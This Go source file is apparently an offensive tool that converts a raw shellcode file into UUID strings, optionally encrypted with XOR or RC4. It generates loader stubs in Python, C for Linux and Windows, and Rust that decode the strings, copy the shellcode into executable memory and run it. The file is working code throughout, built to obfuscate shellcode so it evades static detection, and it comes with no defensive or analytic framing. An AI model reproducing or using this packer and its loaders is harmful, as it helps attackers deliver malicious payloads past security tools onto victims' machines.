1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
|
package main
import (
"crypto/rand"
"encoding/binary"
"flag"
"fmt"
"os"
"path/filepath"
"text/template"
)
const pythonStub = `import uuid
import mmap
import ctypes
uuids = [
{{- range .UUIDs }}
'{{ . }}',
{{- end }}
]
print('decoding uuids to shellcode')
shellcode = b''
for u in uuids:
shellcode += uuid.UUID(u).bytes
shellcode = shellcode[:{{ .OrigLen }}]
{{- if .XORKey }}
print('xor decrypting shellcode')
key = {{ .XORKey }}
shellcode = bytes(b ^ key for b in shellcode)
{{- end }}
{{- if .RC4Key }}
def rc4_crypt(data, key):
S = list(range(256))
j = 0
out = bytearray()
key = bytearray(key, 'utf-8')
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i]
i = j = 0
for byte in data:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
out.append(byte ^ S[(S[i] + S[j]) % 256])
return bytes(out)
print('rc4 decrypting shellcode')
rc4_key = "{{ .RC4Key }}"
shellcode = rc4_crypt(shellcode, rc4_key)
{{- end }}
print(f'decoded shellcode length: {len(shellcode)} bytes')
print('calling mmap for memory allocation')
pagesize = mmap.PAGESIZE
size = ((len(shellcode) + pagesize - 1) // pagesize) * pagesize
mem = mmap.mmap(-1, size, prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
mem.write(shellcode)
func = ctypes.CFUNCTYPE(None)(ctypes.addressof(ctypes.c_int.from_buffer(mem)))
print('executing shellcode')
func()
`
const cStub = `// gcc -z execstack -fno-stack-protector -no-pie -o stub stub.c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <ctype.h>
#include <sys/mman.h>
#define ORIGINAL_SHELLCODE_LENGTH {{ .OrigLen }}
const char* uuid_strings[] = {
{{- range .UUIDs }}
"{{ . }}",
{{- end }}
};
#define UUID_COUNT (sizeof(uuid_strings) / sizeof(uuid_strings[0]))
#define SHELLCODE_TOTAL_LEN (UUID_COUNT * 16)
uint8_t hexchar(char c) {
if ('0' <= c && c <= '9') return c - '0';
if ('a' <= c && c <= 'f') return c - 'a' + 10;
if ('A' <= c && c <= 'F') return c - 'A' + 10;
return 0;
}
void parse_uuid(const char* str, uint8_t* out) {
int j = 0;
for (int i = 0; str[i] != '\0' && j < 16; ) {
if (str[i] == '-') {
++i;
continue;
}
out[j++] = (hexchar(str[i]) << 4) | hexchar(str[i+1]);
i += 2;
}
}
uint8_t* decode_uuids() {
printf("decoding uuids to shellcode\n");
uint8_t* buf = malloc(SHELLCODE_TOTAL_LEN);
if (!buf) {
fprintf(stderr, "malloc failed\n");
exit(1);
}
for (size_t i = 0; i < UUID_COUNT; ++i) {
parse_uuid(uuid_strings[i], buf + i * 16);
}
return buf;
}
{{- if .XORKey }}
void xor_decode(uint8_t *buf, size_t len, uint8_t key) {
printf("xor decrypting shellcode\n");
for (size_t i = 0; i < len; ++i)
buf[i] ^= key;
}
{{- end }}
{{- if .RC4Key }}
void rc4_crypt(uint8_t *data, size_t len, const char *key) {
printf("rc4 decrypting shellcode\n");
uint8_t S[256];
int i, j = 0;
for (i = 0; i < 256; i++) S[i] = i;
for (i = 0; i < 256; i++) {
j = (j + S[i] + key[i % strlen(key)]) & 0xFF;
uint8_t tmp = S[i]; S[i] = S[j]; S[j] = tmp;
}
i = j = 0;
for (size_t n = 0; n < len; n++) {
i = (i + 1) & 0xFF;
j = (j + S[i]) & 0xFF;
uint8_t tmp = S[i]; S[i] = S[j]; S[j] = tmp;
data[n] ^= S[(S[i] + S[j]) & 0xFF];
}
}
{{- end }}
void decrypt_shellcode(uint8_t *buf) {
{{- if .XORKey }}
xor_decode(buf, SHELLCODE_TOTAL_LEN, {{ .XORKey }});
{{- end }}
{{- if .RC4Key }}
rc4_crypt(buf, SHELLCODE_TOTAL_LEN, "{{ .RC4Key }}");
{{- end }}
}
int main() {
uint8_t* shellcode = decode_uuids();
decrypt_shellcode(shellcode);
printf("decoded shellcode length: %zu\n", SHELLCODE_TOTAL_LEN);
printf("calling mmap for memory allocation\n");
void *exec = mmap(0, SHELLCODE_TOTAL_LEN, PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_ANON | MAP_PRIVATE, -1, 0);
if (exec == MAP_FAILED) {
perror("mmap");
return 1;
}
printf("executing shellcode\n");
memcpy(exec, shellcode, ORIGINAL_SHELLCODE_LENGTH);
((void(*)())exec)();
free(shellcode);
return 0;
}
`
const cWinStub = `// x86_64-w64-mingw32-gcc -o stub.exe stub.c -Wl,--nxcompat -Wl,--dynamicbase
#include <windows.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#define ORIGINAL_SHELLCODE_LENGTH {{ .OrigLen }}
const char* uuid_strings[] = {
{{- range .UUIDs }}
"{{ . }}",
{{- end }}
};
#define UUID_COUNT (sizeof(uuid_strings) / sizeof(uuid_strings[0]))
#define SHELLCODE_TOTAL_LEN (UUID_COUNT * 16)
uint8_t hexchar(char c) {
if ('0' <= c && c <= '9') return c - '0';
if ('a' <= c && c <= 'f') return c - 'a' + 10;
if ('A' <= c && c <= 'F') return c - 'A' + 10;
return 0;
}
void parse_uuid(const char* str, uint8_t* out) {
int j = 0;
for (int i = 0; str[i] != '\0' && j < 16; ) {
if (str[i] == '-') {
++i;
continue;
}
out[j++] = (hexchar(str[i]) << 4) | hexchar(str[i+1]);
i += 2;
}
}
uint8_t* decode_uuids(size_t count, size_t* out_len) {
printf("decoding uuids to shellcode\n");
uint8_t* buf = (uint8_t*)malloc(count * 16);
if (!buf) {
fprintf(stderr, "malloc failed\n");
exit(1);
}
for (size_t i = 0; i < count; ++i) {
parse_uuid(uuid_strings[i], buf + i * 16);
}
*out_len = count * 16;
return buf;
}
{{- if .XORKey }}
void xor_decode(uint8_t *buf, size_t len, uint8_t key) {
printf("xor decrypting shellcode\n");
for (size_t i = 0; i < len; ++i)
buf[i] ^= key;
}
{{- end }}
{{- if .RC4Key }}
void rc4_crypt(uint8_t *data, size_t len, const char *key) {
printf("rc4 decrypting shellcode\n");
uint8_t S[256];
int i, j = 0;
for (i = 0; i < 256; i++) S[i] = i;
for (i = 0; i < 256; i++) {
j = (j + S[i] + key[i % strlen(key)]) & 0xFF;
uint8_t tmp = S[i]; S[i] = S[j]; S[j] = tmp;
}
i = j = 0;
for (size_t n = 0; n < len; n++) {
i = (i + 1) & 0xFF;
j = (j + S[i]) & 0xFF;
uint8_t tmp = S[i]; S[i] = S[j]; S[j] = tmp;
data[n] ^= S[(S[i] + S[j]) & 0xFF];
}
}
{{- end }}
void decrypt_shellcode(uint8_t *buf) {
{{- if .XORKey }}
xor_decode(buf, SHELLCODE_TOTAL_LEN, {{ .XORKey }});
{{- end }}
{{- if .RC4Key }}
rc4_crypt(buf, SHELLCODE_TOTAL_LEN, "{{ .RC4Key }}");
{{- end }}
}
int main() {
size_t shellcode_len = 0;
uint8_t* shellcode = decode_uuids(UUID_COUNT, &shellcode_len);
decrypt_shellcode(shellcode);
printf("decoded shellcode length: %zu\n", shellcode_len);
printf("calling VirtualAlloc for memory allocation\n");
void* exec = VirtualAlloc(NULL, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!exec) {
fprintf(stderr, "VirtualAlloc failed\n");
free(shellcode);
return 1;
}
printf("executing shellcode\n");
memcpy(exec, shellcode, ORIGINAL_SHELLCODE_LENGTH);
((void(*)())exec)();
free(shellcode);
return 0;
}
`
const rustStub = `// rustup target add x86_64-pc-windows-gnu
// cargo build --release --target x86_64-pc-windows-gnu
//
// rustup target add x86_64-unknown-linux-gnu
// cargo build --release --target x86_64-unknown-linux-gnu
#[cfg(windows)]
use winapi::ctypes::c_void;
#[cfg(unix)]
use std::ffi::c_void;
use std::ptr;
#[cfg(unix)]
use libc::{mmap, MAP_ANON, MAP_PRIVATE, PROT_EXEC, PROT_READ, PROT_WRITE};
#[cfg(windows)]
extern crate winapi;
use uuid::Uuid;
const ORIGINAL_SHELLCODE_LENGTH: usize = {{ .OrigLen }};
const UUIDS: [&str; {{ len .UUIDs }}] = [
{{- range .UUIDs }}
"{{ . }}",
{{- end }}
];
fn parse_uuids() -> Vec<u8> {
println!("decoding uuids to shellcode");
let mut buf = Vec::with_capacity(UUIDS.len() * 16);
for s in UUIDS.iter() {
let u = Uuid::parse_str(s).unwrap();
buf.extend_from_slice(u.as_bytes());
}
buf
}
{{- if .XORKey }}
fn xor_decrypt(data: &mut [u8], key: u8) {
println!("xor decrypting shellcode");
for b in data.iter_mut() {
*b ^= key;
}
}
{{- end }}
{{- if .RC4Key }}
fn rc4_crypt(data: &mut [u8], key: &str) {
println!("rc4 decrypting shellcode");
let mut s: Vec<u8> = (0..=255).collect();
let k: Vec<u8> = key.bytes().collect();
let mut j = 0;
for i in 0..256 {
j = (j + s[i] as usize + k[i % k.len()] as usize) % 256;
s.swap(i, j);
}
let mut i = 0;
j = 0;
for byte in data.iter_mut() {
i = (i + 1) % 256;
j = (j + s[i] as usize) % 256;
s.swap(i, j);
let idx = (s[i] as usize + s[j] as usize) % 256;
*byte ^= s[idx];
}
}
{{- end }}
fn main() {
let mut shellcode = parse_uuids();
{{- if .XORKey }}
xor_decrypt(&mut shellcode, {{ .XORKey }});
{{- end }}
{{- if .RC4Key }}
rc4_crypt(&mut shellcode, "{{ .RC4Key }}");
{{- end }}
println!("decoded shellcode length: {}", ORIGINAL_SHELLCODE_LENGTH);
shellcode.truncate(ORIGINAL_SHELLCODE_LENGTH);
println!("allocating executable memory");
unsafe {
let ptr: *mut c_void;
#[cfg(unix)]
{
ptr = mmap(
ptr::null_mut(),
shellcode.len(),
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANON,
-1,
0,
);
}
#[cfg(windows)]
{
use winapi::um::memoryapi::VirtualAlloc;
use winapi::um::winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE};
ptr = VirtualAlloc(
ptr::null_mut(),
shellcode.len(),
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE,
);
}
if ptr.is_null() {
eprintln!("memory allocation failed");
return;
}
println!("executing shellcode");
ptr::copy_nonoverlapping(shellcode.as_ptr(), ptr as *mut u8, shellcode.len());
let exec_fn: extern "C" fn() = std::mem::transmute(ptr);
exec_fn();
}
}
`
func main() {
filePath := flag.String("file", "", "path to binary shellcode file")
stubLang := flag.String("stub", "", "stub language to output (py, c, cwin, rs)")
xorFlag := flag.Bool("xor", false, "enable single-byte xor encoding with random key")
rc4Flag := flag.Bool("rc4", false, "enable rc4 encryption with 16bit random key")
flag.Parse()
if *filePath == "" {
flag.Usage()
os.Exit(1)
}
data, err := os.ReadFile(*filePath)
if err != nil {
fmt.Fprintf(os.Stderr, "[err] failed to read file: %v\n", err)
os.Exit(1)
}
origLen := len(data)
if origLen%16 != 0 {
fmt.Printf("[inf] shellcode size (%d bytes) is not a multiple of 16, will pad with nullbytes\n", origLen)
pad := 16 - (origLen % 16)
data = append(data, make([]byte, pad)...)
}
if *xorFlag && *rc4Flag {
fmt.Fprintf(os.Stderr, "[err] cannot use both xor and rc4\n")
os.Exit(1)
}
var rc4Key []byte
var xorKey byte = 0
if *xorFlag {
key := make([]byte, 1)
_, err := rand.Read(key)
if err != nil {
fmt.Fprintf(os.Stderr, "[err] failed to generate xor key: %v\n", err)
os.Exit(1)
}
xorKey = key[0]
fmt.Printf("[inf] using xor key: 0x%02x\n", xorKey)
for i := 0; i < len(data); i++ {
data[i] ^= xorKey
}
} else if *rc4Flag {
var err error
rc4Key, err = generateRC4Key()
if err != nil {
fmt.Fprintf(os.Stderr, "[err] failed to generate rc4 key: %v\n", err)
os.Exit(1)
}
fmt.Printf("[inf] using rc4 key: %s\n", string(rc4Key))
data, err = rc4Encrypt(data, rc4Key)
if err != nil {
fmt.Fprintf(os.Stderr, "[err] rc4 encryption failed: %v\n", err)
os.Exit(1)
}
}
var uuids []string
for i := 0; i < len(data); i += 16 {
chunk := data[i : i+16]
uuid := formatAsUUID(chunk)
uuids = append(uuids, uuid)
fmt.Println(uuid)
}
if *stubLang != "" {
var stubContent string
var fileName string
switch *stubLang {
case "py":
stubContent = pythonStub
fileName = "stub.py"
case "c":
stubContent = cStub
fileName = "stub.c"
case "cwin":
stubContent = cWinStub
fileName = "stub.c"
case "rs":
stubContent = rustStub
baseDir := "stub"
srcDir := filepath.Join(baseDir, "src")
err = os.MkdirAll(srcDir, 0755)
if err != nil {
fmt.Fprintf(os.Stderr, "[err] failed to create directories: %v\n", err)
os.Exit(1)
}
cargoToml := `[package]
name = "stub"
version = "0.0.1"
edition = "2024"
[dependencies]
uuid = "1.3"
libc = "0.2"
[target.'cfg(windows)'.dependencies]
winapi = { version = "0.3", features = ["memoryapi", "winnt"] }
`
err = os.WriteFile(filepath.Join(baseDir, "Cargo.toml"), []byte(cargoToml), 0644)
if err != nil {
fmt.Fprintf(os.Stderr, "[err] failed to write Cargo.toml: %v\n", err)
os.Exit(1)
}
fileName = filepath.Join(srcDir, "main.rs")
err = renderTemplateToFile(stubContent, uuids, origLen, xorKey, string(rc4Key), fileName)
if err != nil {
fmt.Fprintf(os.Stderr, "[err] failed to write stub.rs: %v\n", err)
os.Exit(1)
}
fmt.Printf("[inf] rust stub written to %s\n", fileName)
default:
fmt.Fprintf(os.Stderr, "[err] unsupported stub language\n")
os.Exit(1)
}
err := renderTemplateToFile(stubContent, uuids, origLen, xorKey, string(rc4Key), fileName)
if err != nil {
fmt.Fprintf(os.Stderr, "[err] failed to write stub: %v\n", err)
os.Exit(1)
}
fmt.Printf("[inf] stub written to %s\n", fileName)
}
}
func generateRC4Key() ([]byte, error) {
const charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
key := make([]byte, 16)
for i := range key {
b := make([]byte, 1)
if _, err := rand.Read(b); err != nil {
return nil, err
}
key[i] = charset[int(b[0])%len(charset)]
}
return key, nil
}
func rc4Encrypt(data, key []byte) ([]byte, error) {
S := [256]byte{}
T := [256]byte{}
for i := 0; i < 256; i++ {
S[i] = byte(i)
T[i] = key[i%len(key)]
}
j := 0
for i := 0; i < 256; i++ {
j = (j + int(S[i]) + int(T[i])) % 256
S[i], S[j] = S[j], S[i]
}
i, j := 0, 0
out := make([]byte, len(data))
for n := 0; n < len(data); n++ {
i = (i + 1) % 256
j = (j + int(S[i])) % 256
S[i], S[j] = S[j], S[i]
K := S[(int(S[i])+int(S[j]))%256]
out[n] = data[n] ^ K
}
return out, nil
}
func formatAsUUID(b []byte) string {
if len(b) != 16 {
return ""
}
return fmt.Sprintf("%08x-%04x-%04x-%04x-%012x",
binary.BigEndian.Uint32(b[0:4]),
binary.BigEndian.Uint16(b[4:6]),
binary.BigEndian.Uint16(b[6:8]),
binary.BigEndian.Uint16(b[8:10]),
b[10:16],
)
}
func renderTemplateToFile(tmplStr string, uuids []string, origLen int, xorKey byte, rc4Key string, fileName string) error {
tmpl, err := template.New("stub").Parse(tmplStr)
if err != nil {
return err
}
f, err := os.Create(fileName)
if err != nil {
return err
}
defer f.Close()
return tmpl.Execute(f, map[string]interface{}{
"UUIDs": uuids,
"OrigLen": origLen,
"XORKey": xorKey,
"RC4Key": string(rc4Key),
})
}
|